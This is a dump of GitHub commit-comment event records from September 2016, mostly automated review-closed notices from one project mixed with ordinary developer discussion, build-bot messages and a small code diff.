{"id":"4550533922","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":18987998,"position":null,"line":null,"path":null,"commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-12T16:58:12Z","updated_at":"2016-09-12T16:58:12Z","body":"\r\n\r\n[WORD SEARCH.zip](https://github.com/anilhdas/Peak_ARG/files/467868/WORD.SEARCH.zip)\r\n[KAKURO.zip](https://github.com/anilhdas/Peak_ARG/files/467869/KAKURO.zip)\r\n"}},"created_at":"2016-09-12T16:58:12Z"}
{"id":"4550534306","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18987999,"position":null,"line":null,"path":null,"commit_id":"e8ac69508cc5ed42b4df18910dd2ba303550215d","created_at":"2016-09-12T16:58:15Z","updated_at":"2016-09-12T16:58:15Z","body":"The screen shot for the referenced by the commit message:\r\n![screenshot](https://cloud.githubusercontent.com/assets/1862162/18444734/5118d7fc-78cf-11e6-92e2-a24ed6ca5fd4.png)\r\n"}},"created_at":"2016-09-12T16:58:15Z"}
{"id":"4550536881","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":18988005,"position":null,"line":null,"path":null,"commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-12T16:58:41Z","updated_at":"2016-09-12T16:58:41Z","body":"Please Check and revert for any Clarifications....We would soon upload the rest of the Puzzle Pages."}},"created_at":"2016-09-12T16:58:41Z"}
{"id":"4550542726","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988018,"position":null,"line":null,"path":null,"commit_id":"a537b126c8344ea93d952c31993a6ac019d558ce","created_at":"2016-09-12T16:59:45Z","updated_at":"2016-09-12T16:59:45Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=36)"}},"created_at":"2016-09-12T16:59:45Z"}
{"id":"4550542732","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988019,"position":null,"line":null,"path":null,"commit_id":"e988211f8765e94b51da840e5174d283c60f7ce8","created_at":"2016-09-12T16:59:46Z","updated_at":"2016-09-12T16:59:46Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=36)"}},"created_at":"2016-09-12T16:59:46Z"}
{"id":"4550542753","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988020,"position":null,"line":null,"path":null,"commit_id":"3dbce416403df98ef8e18c4250ba38ae5e1907d5","created_at":"2016-09-12T16:59:46Z","updated_at":"2016-09-12T16:59:46Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=36)"}},"created_at":"2016-09-12T16:59:46Z"}
{"id":"4550542779","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988021,"position":null,"line":null,"path":null,"commit_id":"3b94f42b4cce656fc0218c4991df790f6d782c9e","created_at":"2016-09-12T16:59:46Z","updated_at":"2016-09-12T16:59:46Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=36)"}},"created_at":"2016-09-12T16:59:46Z"}
{"id":"4550542925","type":"CommitCommentEvent","actor":{"login":"nden"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18988022,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:59:48Z","updated_at":"2016-09-12T16:59:48Z","body":"If there's a non-background shutter it should be only one (never more than one).\r\n\r\nWhen all shutters in a slitlet are background shutters, let's pick the one for which `j = (jmax - jmin) // 2 + 1` in integer arithmetic. `i` should be the same for all shutters."}},"created_at":"2016-09-12T16:59:48Z"}
{"id":"4550543398","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988023,"position":null,"line":null,"path":null,"commit_id":"af81f2e2a21991e766f72dfbf39e801e17e240e2","created_at":"2016-09-12T16:59:52Z","updated_at":"2016-09-12T16:59:52Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=37)"}},"created_at":"2016-09-12T16:59:52Z"}
{"id":"4550543409","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988024,"position":null,"line":null,"path":null,"commit_id":"9edd480c5f7dca4e9074d7d3df4c74d5bcdcbd86","created_at":"2016-09-12T16:59:52Z","updated_at":"2016-09-12T16:59:52Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=37)"}},"created_at":"2016-09-12T16:59:52Z"}
{"id":"4550543421","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988025,"position":null,"line":null,"path":null,"commit_id":"f523e947c2988e44541fda42a835be6f2afd30b2","created_at":"2016-09-12T16:59:53Z","updated_at":"2016-09-12T16:59:53Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=37)"}},"created_at":"2016-09-12T16:59:53Z"}
{"id":"4550544373","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988029,"position":null,"line":null,"path":null,"commit_id":"33b9c61f213ba8855a396b614180295c829c7630","created_at":"2016-09-12T17:00:05Z","updated_at":"2016-09-12T17:00:05Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:05Z"}
{"id":"4550544409","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988032,"position":null,"line":null,"path":null,"commit_id":"18e0b51f231661f47f92b17f3938756f92ab75fe","created_at":"2016-09-12T17:00:05Z","updated_at":"2016-09-12T17:00:05Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:05Z"}
{"id":"4550544458","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988033,"position":null,"line":null,"path":null,"commit_id":"fcb6db33367f98e5262c922b9ab77b951997d7ca","created_at":"2016-09-12T17:00:06Z","updated_at":"2016-09-12T17:00:06Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:06Z"}
{"id":"4550544531","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988034,"position":null,"line":null,"path":null,"commit_id":"c31edc43d1c3b1c27f5f331a792043f92810a73f","created_at":"2016-09-12T17:00:07Z","updated_at":"2016-09-12T17:00:07Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:07Z"}
{"id":"4550544587","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988036,"position":null,"line":null,"path":null,"commit_id":"7d2f11afdd92975d3753651281969e11be7e3085","created_at":"2016-09-12T17:00:08Z","updated_at":"2016-09-12T17:00:08Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:08Z"}
{"id":"4550544632","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988038,"position":null,"line":null,"path":null,"commit_id":"0115f7bbd00af265d4dea1c08a54807b9cceab7b","created_at":"2016-09-12T17:00:09Z","updated_at":"2016-09-12T17:00:09Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:09Z"}
{"id":"4550544668","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988039,"position":null,"line":null,"path":null,"commit_id":"f89e3b7596d90af7191310623b018378ddc81c8d","created_at":"2016-09-12T17:00:10Z","updated_at":"2016-09-12T17:00:10Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:10Z"}
{"id":"4550544706","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988040,"position":null,"line":null,"path":null,"commit_id":"e5ee8a49c4edd4a6ff4fc9e6d040eea64069af39","created_at":"2016-09-12T17:00:10Z","updated_at":"2016-09-12T17:00:10Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:10Z"}
{"id":"4550544751","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988041,"position":null,"line":null,"path":null,"commit_id":"f62aa843ac3d0b999b77d0bce584ac76c722ae91","created_at":"2016-09-12T17:00:11Z","updated_at":"2016-09-12T17:00:11Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:11Z"}
{"id":"4550544785","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988042,"position":null,"line":null,"path":null,"commit_id":"49d5f1f2d1f1ee48c6290f584db303e83351676e","created_at":"2016-09-12T17:00:11Z","updated_at":"2016-09-12T17:00:11Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:11Z"}
{"id":"4550544815","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988043,"position":null,"line":null,"path":null,"commit_id":"b3678e534ea4fca10824a22454a0777886e87854","created_at":"2016-09-12T17:00:12Z","updated_at":"2016-09-12T17:00:12Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=38)"}},"created_at":"2016-09-12T17:00:12Z"}
{"id":"4550545303","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988045,"position":null,"line":null,"path":null,"commit_id":"3a47bc2209eb91d912ed4f1a8004e3fbaa57c422","created_at":"2016-09-12T17:00:17Z","updated_at":"2016-09-12T17:00:17Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:17Z"}
{"id":"4550545333","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988046,"position":null,"line":null,"path":null,"commit_id":"395ac5e22e9c83cdeadbbce9e30cb06fa7d31ebf","created_at":"2016-09-12T17:00:18Z","updated_at":"2016-09-12T17:00:18Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:18Z"}
{"id":"4550545372","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988047,"position":null,"line":null,"path":null,"commit_id":"e903ee4f060ed4d4a4021b905f74a53bdb13413f","created_at":"2016-09-12T17:00:18Z","updated_at":"2016-09-12T17:00:18Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:18Z"}
{"id":"4550545403","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988049,"position":null,"line":null,"path":null,"commit_id":"95c1d7947cd86daa93077ba60db93207e16acf20","created_at":"2016-09-12T17:00:18Z","updated_at":"2016-09-12T17:00:18Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:18Z"}
{"id":"4550545419","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988050,"position":null,"line":null,"path":null,"commit_id":"052265d909047fd5516ef1fbde4d07c7d65fbf37","created_at":"2016-09-12T17:00:19Z","updated_at":"2016-09-12T17:00:19Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:19Z"}
{"id":"4550545444","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988051,"position":null,"line":null,"path":null,"commit_id":"078a486ab5b3d5b3dceda7ff9843942b77e82d89","created_at":"2016-09-12T17:00:19Z","updated_at":"2016-09-12T17:00:19Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=39)"}},"created_at":"2016-09-12T17:00:19Z"}
{"id":"4550546134","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988053,"position":null,"line":null,"path":null,"commit_id":"976069b929cd28200a38bb1957efa2faa4c3c9b4","created_at":"2016-09-12T17:00:26Z","updated_at":"2016-09-12T17:00:26Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=40)"}},"created_at":"2016-09-12T17:00:26Z"}
{"id":"4550546164","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988054,"position":null,"line":null,"path":null,"commit_id":"3d2e120739b80c27bc21f608aec3795131e49d48","created_at":"2016-09-12T17:00:26Z","updated_at":"2016-09-12T17:00:26Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=40)"}},"created_at":"2016-09-12T17:00:26Z"}
{"id":"4550546810","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988055,"position":null,"line":null,"path":null,"commit_id":"c8e9c87857ab8fb5409a6de2d3925414a564fb54","created_at":"2016-09-12T17:00:32Z","updated_at":"2016-09-12T17:00:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=41)"}},"created_at":"2016-09-12T17:00:32Z"}
{"id":"4550546840","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988056,"position":null,"line":null,"path":null,"commit_id":"1c60791a17e7788750641db5f4bf51f402f82f06","created_at":"2016-09-12T17:00:32Z","updated_at":"2016-09-12T17:00:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=41)"}},"created_at":"2016-09-12T17:00:32Z"}
{"id":"4550546878","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988057,"position":null,"line":null,"path":null,"commit_id":"988e73edb390ad431ca81d8b658637e97323dc94","created_at":"2016-09-12T17:00:32Z","updated_at":"2016-09-12T17:00:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=41)"}},"created_at":"2016-09-12T17:00:32Z"}
{"id":"4550546906","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988058,"position":null,"line":null,"path":null,"commit_id":"ed649a165652bfed8562dc6620cdb14dc69445f4","created_at":"2016-09-12T17:00:33Z","updated_at":"2016-09-12T17:00:33Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=41)"}},"created_at":"2016-09-12T17:00:33Z"}
{"id":"4550547826","type":"CommitCommentEvent","actor":{"login":"ibrahimlawal"},"repo":{"name":"PaystackHQ/paystack-magento"},"payload":{"comment":{"id":18988061,"position":null,"line":null,"path":null,"commit_id":"25d248b4516384b9cb487bd70c6bfbc73e40eff4","created_at":"2016-09-12T17:00:42Z","updated_at":"2016-09-12T17:00:42Z","body":"Fixes #1 "}},"created_at":"2016-09-12T17:00:42Z"}
{"id":"4550554992","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18988084,"position":null,"line":null,"path":null,"commit_id":"4ab3108f80fd641443ce7b2d25bb3fe529233efe","created_at":"2016-09-12T17:02:05Z","updated_at":"2016-09-12T17:02:05Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ab3108f80fd641443ce7b2d25bb3fe529233efe-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ab3108f80fd641443ce7b2d25bb3fe529233efe-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T17:02:05Z"}
{"id":"4550557879","type":"CommitCommentEvent","actor":{"login":"weidzhang"},"repo":{"name":"WEI-Tech/PlayToUseGit"},"payload":{"comment":{"id":18988093,"position":2,"line":2,"path":"DavidTestFile.txt","commit_id":"944bc44ddd37b3ced3a840197044053b2f6cde8f","created_at":"2016-09-12T17:02:38Z","updated_at":"2016-09-12T17:02:38Z","body":"What?"}},"created_at":"2016-09-12T17:02:38Z"}
{"id":"4550558485","type":"CommitCommentEvent","actor":{"login":"bhorn1"},"repo":{"name":"bhorn1/wvu_undergrad"},"payload":{"comment":{"id":18988095,"position":null,"line":null,"path":null,"commit_id":"2599634acbe03bf7e3f56fa86d0e2a039388c58e","created_at":"2016-09-12T17:02:44Z","updated_at":"2016-09-12T17:02:44Z","body":"rollback"}},"created_at":"2016-09-12T17:02:44Z"}
{"id":"4550563462","type":"CommitCommentEvent","actor":{"login":"quintonm"},"repo":{"name":"p6spy/p6spy"},"payload":{"comment":{"id":18988111,"position":null,"line":null,"path":null,"commit_id":"8184bd6e6739e37850f5f1242390b586a25009f5","created_at":"2016-09-12T17:03:40Z","updated_at":"2016-09-12T17:03:40Z","body":"Let's see if we can get this change into the integration tests to see if it fixes the problem.   "}},"created_at":"2016-09-12T17:03:40Z"}
{"id":"4550566430","type":"CommitCommentEvent","actor":{"login":"devemux86"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":18988124,"position":null,"line":null,"path":null,"commit_id":"060e20f5dbf26bdb5849b9f2d5dd95e9a1a037a5","created_at":"2016-09-12T17:04:15Z","updated_at":"2016-09-12T17:04:15Z","body":"Other projects should be updated also, right? (like `map-matching`)"}},"created_at":"2016-09-12T17:04:15Z"}
{"id":"4550566461","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18988125,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T17:04:16Z","updated_at":"2016-09-12T17:04:16Z","body":"> Current work of Denis, Tammo and Peter should not be impacted by all those speculations on the future.\r\n\r\nYes, please ....\r\n\r\n> but also their js workaround\r\nWe really don't need another event/system for that. Please : we already have all we want. Next step is to ust move the 5 point star+emoticon to plugin . Because it's VERY easy....\r\nIn fact : i want to do the same for slider in multiple numerci. Just need registerScript (for data) + registerScriptFile (for action)."}},"created_at":"2016-09-12T17:04:16Z"}
{"id":"4550566863","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18988126,"position":8,"line":147,"path":"hphp/hack/src/heap/hh_shared.c","commit_id":"da73c736615fc493bf89c022e7fa8adb37b95bca","created_at":"2016-09-12T17:04:20Z","updated_at":"2016-09-12T17:04:20Z","body":"well, then should we send a new PR for this commit?"}},"created_at":"2016-09-12T17:04:20Z"}
{"id":"4550572775","type":"CommitCommentEvent","actor":{"login":"hbushouse"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18988145,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T17:05:25Z","updated_at":"2016-09-12T17:05:25Z","body":"👍 "}},"created_at":"2016-09-12T17:05:25Z"}
{"id":"4550573628","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18988146,"position":null,"line":null,"path":null,"commit_id":"ecdf83e079af1f91ee5520c12a434f73db001191","created_at":"2016-09-12T17:05:34Z","updated_at":"2016-09-12T17:05:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eU2i2LNyQ9Wyvfk7A38rNw"}},"created_at":"2016-09-12T17:05:34Z"}
{"id":"4550575369","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18988149,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T17:05:49Z","updated_at":"2016-09-12T17:05:49Z","body":"find_pairs(puzzle);\r\navoid_trios(puzzle);\r\n complete_RC(puzzle);\r\nreturnen allemaal 0 als er iets verandert is"}},"created_at":"2016-09-12T17:05:49Z"}
{"id":"4550576589","type":"CommitCommentEvent","actor":{"login":"nigoroll"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18988154,"position":null,"line":null,"path":null,"commit_id":"2761c4362cea5604ff3e27acb5cc1283e503269a","created_at":"2016-09-12T17:06:03Z","updated_at":"2016-09-12T17:06:03Z","body":"I still don't quite understand why you have decided to convert to a float first and then truncate it. This simple change against the previous code seems to do the same and passes your updated vtc:\r\n\r\n```\r\ndiff --git a/lib/libvmod_std/vmod_std_conversions.c b/lib/libvmod_std/vmod_std_conversions.c\r\nindex 1506ec9..c3cd45a 100644\r\n--- a/lib/libvmod_std/vmod_std_conversions.c\r\n+++ b/lib/libvmod_std/vmod_std_conversions.c\r\n@@ -120,7 +120,7 @@ vmod_integer(VRT_CTX, VCL_STRING p, VCL_INT i)\r\n \r\n        r = strtol(p, &e, 0);\r\n \r\n-       if (e == NULL || *e != '\\0')\r\n+       if (e == NULL || (*e != '\\0' && *e != '.'))\r\n                return (i);\r\n \r\n        return (r);\r\n```\r\n"}},"created_at":"2016-09-12T17:06:03Z"}
{"id":"4550576983","type":"CommitCommentEvent","actor":{"login":"brechmos-stsci"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18988157,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T17:06:09Z","updated_at":"2016-09-12T17:06:09Z","body":"Got it.  I'll re-work that and make some changes in the test data."}},"created_at":"2016-09-12T17:06:09Z"}
{"id":"4550578440","type":"CommitCommentEvent","actor":{"login":"satoon101"},"repo":{"name":"GunGame-Dev-Team/GunGame-SP"},"payload":{"comment":{"id":18988162,"position":null,"line":null,"path":null,"commit_id":"1ee934ed3afbbc045d0d8b74191f4fdda154c16b","created_at":"2016-09-12T17:06:27Z","updated_at":"2016-09-12T17:06:27Z","body":"It is just a personal preference.\r\n\r\nI added the relative imports when I was having issues with PyCharm knowing about 'gungame'.  I ended up modifying everything in the core and games packages to use relative imports at that point.  I did not do the same with the plugins.included packages, because it would have been 4 periods to start the relative imports, which looks ridiculous to me.\r\n\r\nSo, once I sorted out the issue with PyCharm, I decided that everything within the core package that relates to the core package will use relative imports, as it all still relates to the core.  But, anything outside of the core, that imports from the core, would use absolute imports.\r\n\r\nIf there are any imports within the games package from other modules/packages in the games package, I will use relative there, as well.\r\n\r\nIn the same light, all included plugins will also use absolute imports when importing from the core.  Imports from within an included plugin to its own modules will use relative."}},"created_at":"2016-09-12T17:06:27Z"}
{"id":"4550578590","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988163,"position":null,"line":null,"path":null,"commit_id":"3efcb3754d83470ace76a28eb36d2573018cb72d","created_at":"2016-09-12T17:06:29Z","updated_at":"2016-09-12T17:06:29Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=42)"}},"created_at":"2016-09-12T17:06:29Z"}
{"id":"4550578615","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988164,"position":null,"line":null,"path":null,"commit_id":"86177cbf07184e41631ce4cd1e691d984bed7553","created_at":"2016-09-12T17:06:29Z","updated_at":"2016-09-12T17:06:29Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=42)"}},"created_at":"2016-09-12T17:06:29Z"}
{"id":"4550578622","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988165,"position":null,"line":null,"path":null,"commit_id":"248ac8cc21175c01c25cb6c291a4b45df6bd320c","created_at":"2016-09-12T17:06:29Z","updated_at":"2016-09-12T17:06:29Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=42)"}},"created_at":"2016-09-12T17:06:29Z"}
{"id":"4550578893","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18988167,"position":null,"line":null,"path":null,"commit_id":"12e7ffbd8e107fcfb86c36e91ed4d1ed854855f3","created_at":"2016-09-12T17:06:33Z","updated_at":"2016-09-12T17:06:33Z","body":"ok thanks.  FYI @alexwykoff please make a note that it's possible this will regress with 0.12.2 when we don't bundle extensions."}},"created_at":"2016-09-12T17:06:33Z"}
{"id":"4550579132","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988169,"position":null,"line":null,"path":null,"commit_id":"a049249a66634e288789882bb86fdc5ea149f472","created_at":"2016-09-12T17:06:37Z","updated_at":"2016-09-12T17:06:37Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=43)"}},"created_at":"2016-09-12T17:06:37Z"}
{"id":"4550579931","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988172,"position":null,"line":null,"path":null,"commit_id":"6460509b87be52718d825d40fdbb3c745a1a9e73","created_at":"2016-09-12T17:06:44Z","updated_at":"2016-09-12T17:06:44Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=44)"}},"created_at":"2016-09-12T17:06:44Z"}
{"id":"4550580412","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988173,"position":null,"line":null,"path":null,"commit_id":"ba3a748f8157447a8ea296f9da16efb850911d2f","created_at":"2016-09-12T17:06:49Z","updated_at":"2016-09-12T17:06:49Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=45)"}},"created_at":"2016-09-12T17:06:49Z"}
{"id":"4550581019","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988177,"position":null,"line":null,"path":null,"commit_id":"c762e72000c5ac3a0c7af307ab81083496338cbc","created_at":"2016-09-12T17:06:56Z","updated_at":"2016-09-12T17:06:56Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=46)"}},"created_at":"2016-09-12T17:06:56Z"}
